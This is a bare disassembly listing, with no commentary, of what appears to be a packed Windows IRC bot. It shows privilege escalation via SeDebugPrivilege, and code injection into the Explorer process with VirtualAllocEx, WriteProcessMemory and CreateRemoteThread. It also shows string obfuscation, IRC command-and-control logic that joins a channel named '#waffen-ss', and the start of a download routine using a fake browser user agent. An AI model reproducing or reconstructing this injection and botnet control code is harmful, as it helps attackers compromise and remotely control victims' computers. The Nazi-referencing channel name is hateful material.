lea eax, [ebp+var_24E4]
push offset loc_31205120
push eax
call sub_312037BA ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31205AF8
push eax
call sub_312037BA ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31205A7C
push eax
call sub_312037BA ; memcpy
add esp, 40h
push offset loc_31205120
call sub_312037C6 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset loc_31205120
push eax
call sub_312037BA ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31201AE3: ; CODE XREF: sub_31201651+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31201AE3
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_312037C0 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_312037C0 ; memset
add esp, 18h
jmp loc_312018E8
; ---------------------------------------------------------------------------
loc_31201B37: ; CODE XREF: sub_31201651+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31205788
push eax
call sub_312037BA ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_312037BA ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_31205808
push eax
call sub_312037BA ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31201B8F: ; CODE XREF: sub_31201651+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31201B9C: ; CODE XREF: sub_31201651+1AD�j
; sub_31201651+1E1�j ...
push 2
push [ebp+var_4]
call dword_3120117C ; shutdown
loc_31201BA7: ; CODE XREF: sub_31201651+166�j
push [ebp+var_4]
call dword_31201194 ; closesocket
pop esi
loc_31201BB1: ; CODE XREF: sub_31201651+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31201651 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31201BB8 proc near ; CODE XREF: UPX0:loc_31202E2A�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_312010E0 ; LoadLibraryA
mov esi, dword_312010DC
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31201C3C
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31201C3C
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31201C3C
lea eax, [ebp+var_C]
push eax
push 20h
call dword_312010D8 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31201C3C: ; CODE XREF: sub_31201BB8+28�j
; sub_31201BB8+37�j ...
pop edi
pop esi
leave
retn
sub_31201BB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31201C40 proc near ; CODE XREF: UPX0:31202E3E�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_3120602C
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_312010EC ; GetModuleHandleA
mov esi, dword_312010DC
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31201C87
loc_31201C83: ; CODE XREF: sub_31201C40+54�j
push 1
jmp short loc_31201CD8
; ---------------------------------------------------------------------------
loc_31201C87: ; CODE XREF: sub_31201C40+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31201C83
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31201138 ; FindWindowA
test eax, eax
jnz short loc_31201CB5
call dword_31201134 ; GetForegroundWindow
test eax, eax
jnz short loc_31201CB5
push 2
jmp short loc_31201CD8
; ---------------------------------------------------------------------------
loc_31201CB5: ; CODE XREF: sub_31201C40+65�j
; sub_31201C40+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_3120113C ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_312010E8 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31201CDB
push 3
loc_31201CD8: ; CODE XREF: sub_31201C40+45�j
; sub_31201C40+73�j
pop eax
jmp short loc_31201D46
; ---------------------------------------------------------------------------
loc_31201CDB: ; CODE XREF: sub_31201C40+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_312010A4
test eax, eax
jz short loc_31201D39
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_312010E4 ; WriteProcessMemory
push ds:dword_31206000
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31201D25
push eax
call esi ; CloseHandle
jmp short loc_31201D40
; ---------------------------------------------------------------------------
loc_31201D25: ; CODE XREF: sub_31201C40+DE�j
push offset aUterm10 ; "uterm10"
call sub_31202ACA
pop ecx
mov [ebp+var_4], 5
jmp short loc_31201D40
; ---------------------------------------------------------------------------
loc_31201D39: ; CODE XREF: sub_31201C40+B2�j
mov [ebp+var_4], 4
loc_31201D40: ; CODE XREF: sub_31201C40+E3�j
; sub_31201C40+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31201D46: ; CODE XREF: sub_31201C40+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31201C40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31201D4B proc near ; CODE XREF: sub_31201DD0+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31201D7E
add ebx, 1Ah
loc_31201D7E: ; CODE XREF: sub_31201D4B+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31201118
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31201DA8
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31201DCB
; ---------------------------------------------------------------------------
loc_31201DA8: ; CODE XREF: sub_31201D4B+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31201DC8
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31201DCB
; ---------------------------------------------------------------------------
loc_31201DC8: ; CODE XREF: sub_31201D4B+68�j
mov al, [ebp+arg_0]
loc_31201DCB: ; CODE XREF: sub_31201D4B+5B�j
; sub_31201D4B+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31201D4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31201DD0 proc near ; CODE XREF: sub_31202786+F8�p
; sub_31202786+139�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31201E2B
mov edi, [ebp+arg_0]
push ebx
loc_31201DE5: ; CODE XREF: sub_31201DD0+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31201D4B
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31201E0F
cmp bl, 7Ah
jg short loc_31201E0F
movsx esi, bl
sub esi, 61h
loc_31201E0F: ; CODE XREF: sub_31201DD0+32�j
; sub_31201DD0+37�j
cmp bl, 41h
jl short loc_31201E1F
cmp bl, 5Ah
jg short loc_31201E1F
movsx esi, bl
sub esi, 41h
loc_31201E1F: ; CODE XREF: sub_31201DD0+42�j
; sub_31201DD0+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31201DE5
pop ebx
jmp short loc_31201E2E
; ---------------------------------------------------------------------------
loc_31201E2B: ; CODE XREF: sub_31201DD0+F�j
mov edi, [ebp+arg_0]
loc_31201E2E: ; CODE XREF: sub_31201DD0+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31201DD0 endp
; =============== S U B R O U T I N E =======================================
sub_31201E35 proc near ; CODE XREF: UPX0:312024C9�p
push esi
mov esi, ecx
push 20001h
call sub_31203794
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31201E35 endp
; =============== S U B R O U T I N E =======================================
sub_31201E4A proc near ; CODE XREF: UPX0:31202532�p
; UPX0:31202585�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_312010B0 ; lstrcpynA
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31201E4A endp
; ---------------------------------------------------------------------------
loc_31201E68: ; CODE XREF: UPX0:3120384E�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_312037A8
push dword ptr [esi+2Ch]
call sub_312037A8
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31201E80 proc near ; CODE XREF: UPX0:31202550�p
; UPX0:312025A3�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_31201180 ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_31202B9A
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31201184 ; ntohs
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31201178 ; connect
test eax, eax
jnz loc_31202085
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31202085
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_312020C2
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31202B14
mov ebp, dword_31201130
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_312010D4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_312010D0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3120119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3120119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31202085
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31201FA9: ; CODE XREF: sub_31201E80+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_312020C2
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31201114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31202032
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31202B14
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3120119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31202085
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31201FA9
; ---------------------------------------------------------------------------
loc_31202032: ; CODE XREF: sub_31201E80+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3120119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31202093
loc_31202085: ; CODE XREF: sub_31201E80+4E�j
; sub_31201E80+6B�j ...
push dword ptr [esi+5Ch]
call dword_31201194 ; closesocket
push 1
pop eax
jmp short loc_312020B5
; ---------------------------------------------------------------------------
loc_31202093: ; CODE XREF: sub_31201E80+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_312020C2
mov [esi+180h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_312020B5: ; CODE XREF: sub_31201E80+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31201E80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_312020C2 proc near ; CODE XREF: sub_31201E80+7C�p
; sub_31201E80+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31201114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3120213C
mov esi, dword_312010D0
lea edi, [eax+4]
push edi
call esi ; lstrlenA
dec eax
cmp eax, 63h
jle short loc_312020FB
push 1
pop eax
jmp short loc_3120213E
; ---------------------------------------------------------------------------
loc_312020FB: ; CODE XREF: sub_312020C2+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_312010B0 ; lstrcpynA
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_31201130 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3120119C ; send
loc_3120213C: ; CODE XREF: sub_312020C2+20�j
xor eax, eax
loc_3120213E: ; CODE XREF: sub_312020C2+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_312020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202145 proc near ; CODE XREF: UPX0:312025F1�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_31201130 ; wsprintfA
mov edi, dword_312010D4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_312010D0 ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3120119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31201198 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_3120220E
test eax, eax
jz short loc_3120220E
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_312020C2
mov edi, dword_31201114
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_312021E7
push 3
jmp short loc_31202210
; ---------------------------------------------------------------------------
loc_312021E7: ; CODE XREF: sub_31202145+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_312021FB
push 4
jmp short loc_31202210
; ---------------------------------------------------------------------------
loc_312021FB: ; CODE XREF: sub_31202145+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_312010B0 ; lstrcpynA
xor eax, eax
jmp short loc_31202211
; ---------------------------------------------------------------------------
loc_3120220E: ; CODE XREF: sub_31202145+74�j
; sub_31202145+78�j
push 2
loc_31202210: ; CODE XREF: sub_31202145+A0�j
; sub_31202145+B4�j
pop eax
loc_31202211: ; CODE XREF: sub_31202145+C7�j
pop edi
pop esi
leave
retn 4
sub_31202145 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202217 proc near ; CODE XREF: sub_31202280+83�p
; UPX0:3120264D�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31201128 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31202B14
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_31201130 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_312010D0 ; lstrlenA
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3120119C ; send
push dword ptr [esi+5Ch]
call dword_31201194 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_31202217 endp
; =============== S U B R O U T I N E =======================================
sub_31202280 proc near ; CODE XREF: UPX0:31202635�p
mov eax, offset loc_3120383C
call sub_31203810
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_312010F0
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_312022BB: ; CODE XREF: sub_31202280+EF�j
call sub_31202C14
test eax, eax
jz short loc_31202308
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31201170 ; select
cmp eax, 0FFFFFFFFh
jz short loc_31202308
call sub_31202E52
test eax, eax
jz short loc_312022EC
push 1
call dword_312010BC ; ExitThread
loc_312022EC: ; CODE XREF: sub_31202280+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_3120231B
mov ecx, esi
call sub_31202217
loc_31202308: ; CODE XREF: sub_31202280+42�j
; sub_31202280+59�j ...
xor eax, eax
loc_3120230A: ; CODE XREF: sub_31202280+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_3120231B: ; CODE XREF: sub_31202280+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31201198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31202386
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_312010D4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_312020C2
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31202786
cmp eax, ebx
jnz short loc_31202308
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31202C14
test eax, eax
jz short loc_31202308
push 64h
call dword_312010D4 ; Sleep
jmp loc_312022BB
; ---------------------------------------------------------------------------
loc_31202374: ; DATA XREF: UPX0:312038B4�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_31201194 ; closesocket
mov eax, offset loc_31202386
retn
; ---------------------------------------------------------------------------
loc_31202386: ; CODE XREF: sub_31202280+B2�j
; DATA XREF: sub_31202280+100�o
push 1
pop eax
jmp loc_3120230A
sub_31202280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3120238E proc near ; CODE XREF: sub_31202786+9D�p
; sub_31202786+2B8�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_312010D0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlenA
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlenA
add ebx, eax
cmp ebx, 10Eh
jle short loc_312023BD
push 1
pop eax
jmp short loc_312023FE
; ---------------------------------------------------------------------------
loc_312023BD: ; CODE XREF: sub_3120238E+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_31201130 ; wsprintfA
add esp, 10h
push 64h
call dword_312010D4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3120119C ; send
xor eax, eax
loc_312023FE: ; CODE XREF: sub_3120238E+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_3120238E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202405 proc near ; CODE XREF: UPX0:312024DF�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push eax
call dword_312010A0 ; GetSystemTime
movzx eax, [ebp+var_10]
movzx ecx, [ebp+var_E]
lea eax, [eax+eax*2]
add eax, ecx
movzx ecx, [ebp+var_A]
add eax, ecx
push eax
call dword_31201108 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31202B14
push 8
push [ebp+arg_4]
call sub_31202B14
add esp, 14h
call dword_31201128 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_31202A9C
leave
retn
sub_31202405 endp
; ---------------------------------------------------------------------------
loc_31202463: ; DATA XREF: sub_31202E66+E2�o
mov eax, offset loc_31203853
call sub_31203810
sub esp, 1E4h
push ebx
push esi
xor ebx, ebx
push edi
mov dword_31205FC8, ebx
call sub_31202A9C
mov esi, dword_31201128
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31202B14
cmp ds:dword_31206038, ebx
mov edi, dword_31201090
pop ecx
pop ecx
jz short loc_312024B8
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcatA
loc_312024B8: ; CODE XREF: UPX0:312024AB�j
lea eax, [ebp-4Ch]
push offset a10 ; "10"
push eax
call edi ; lstrcatA
lea ecx, [ebp-1F0h]
call sub_31201E35
mov [ebp-4], ebx
loc_312024D1: ; CODE XREF: UPX0:31202641�j
; UPX0:31202667�j
push offset dword_31205FCC
lea eax, [ebp-18h]
push offset dword_31205FD0
push eax
call sub_31202405
add esp, 0Ch
loc_312024E7: ; CODE XREF: UPX0:312024FB�j
call sub_31202C14
test eax, eax
jnz short loc_312024FD
push 3E8h
call dword_312010D4 ; Sleep
jmp short loc_312024E7
; ---------------------------------------------------------------------------
loc_312024FD: ; CODE XREF: UPX0:312024EE�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31202B14
pop ecx
xor edi, edi
pop ecx
loc_31202518: ; CODE XREF: UPX0:3120255D�j
push 1A0Bh
mov eax, edi
push 2
cdq
pop ecx
idiv ecx
lea ecx, [ebp-1F0h]
push off_31205BC0[edx*4]
call sub_31201E4A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_312010D0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-1F0h]
call sub_31201E80
test eax, eax
jz short loc_312025B4
inc edi
cmp edi, 8
jl short loc_31202518
xor edi, edi
loc_31202561: ; CODE XREF: UPX0:312025B0�j
call sub_31202C14
test eax, eax
jz short loc_312025C2
push 1A0Bh
call esi ; rand
push 0Dh
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-1F0h]
push off_31205BC0[edx*4]
call sub_31201E4A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_312010D0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-1F0h]
call sub_31201E80
test eax, eax
jz short loc_312025BF
inc edi
cmp edi, 34h
jb short loc_31202561
jmp short loc_312025C2
; ---------------------------------------------------------------------------
loc_312025B4: ; CODE XREF: UPX0:31202557�j
push 1
pop ebx
mov dword_31205FC8, ebx
jmp short loc_312025CB
; ---------------------------------------------------------------------------
loc_312025BF: ; CODE XREF: UPX0:312025AA�j
push 1
pop ebx
loc_312025C2: ; CODE XREF: UPX0:31202568�j
; UPX0:312025B2�j
cmp dword_31205FC8, 0
jz short loc_312025DA
loc_312025CB: ; CODE XREF: UPX0:312025BD�j
lea eax, [ebp-18h]
push offset aWaffenSs ; "#waffen-ss"
push eax
call dword_31201094 ; lstrcpyA
loc_312025DA: ; CODE XREF: UPX0:312025C9�j
test ebx, ebx
jz short loc_31202652
call sub_31202C14
test eax, eax
jz short loc_31202652
loc_312025E7: ; CODE XREF: UPX0:3120260C�j
lea eax, [ebp-18h]
lea ecx, [ebp-1F0h]
push eax
call sub_31202145
test eax, eax
jz short loc_3120260E
push 3E8h
call dword_312010D4 ; Sleep
call sub_31202C14
test eax, eax
jnz short loc_312025E7
loc_3120260E: ; CODE XREF: UPX0:312025F8�j
cmp dword_31205FC8, 0
jz short loc_3120261E
mov edx, 0A8C0h
jmp short loc_3120262E
; ---------------------------------------------------------------------------
loc_3120261E: ; CODE XREF: UPX0:31202615�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_3120262E: ; CODE XREF: UPX0:3120261C�j
push edx
lea ecx, [ebp-1F0h]
call sub_31202280
call sub_31202C14
test eax, eax
jz loc_312024D1
lea ecx, [ebp-1F0h]
call sub_31202217
loc_31202652: ; CODE XREF: UPX0:312025DC�j
; UPX0:312025E5�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_312010D4 ; Sleep
jmp loc_312024D1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3120266C proc near ; CODE XREF: sub_31202786+5F�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31201144 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_31202697
push 1
jmp loc_3120272D
